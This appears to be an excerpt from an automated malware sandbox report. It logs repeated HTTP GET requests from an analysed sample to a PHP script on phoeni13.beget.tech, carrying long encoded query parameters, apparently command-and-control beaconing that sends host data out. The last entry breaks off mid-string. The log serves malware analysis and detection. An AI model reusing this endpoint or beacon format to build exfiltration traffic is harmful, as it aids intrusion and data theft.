Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nIwglZpFkaJZTSplFMZpXWzUUbZxmVHp1dRdlWtZ0VNpGaE5kMZ1mT0UUbZhmSq10aspWT5l0VONTRH9EeV1WWpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIjFTZ1QzYkFDO5QmMyMDOzYWOiN2NhJWY1cjZxYzMjFTMxI2N5MmMkJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&e2d3fb800645a2797de70f7dc33b39b6=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWQq1kNjpXT2kEVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFROxmU65ENNpXT6FkaO1mTy00dRRUTzkEVN1mQql0cJNlS3lUaPlWUt5ENZdUTppFVNlmRXlFeVdVT1UlaZpmVX5UeVd0T3FEVNJTV65kaWdUToJFVZVTStlVbapWSzl0UKVzaqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRV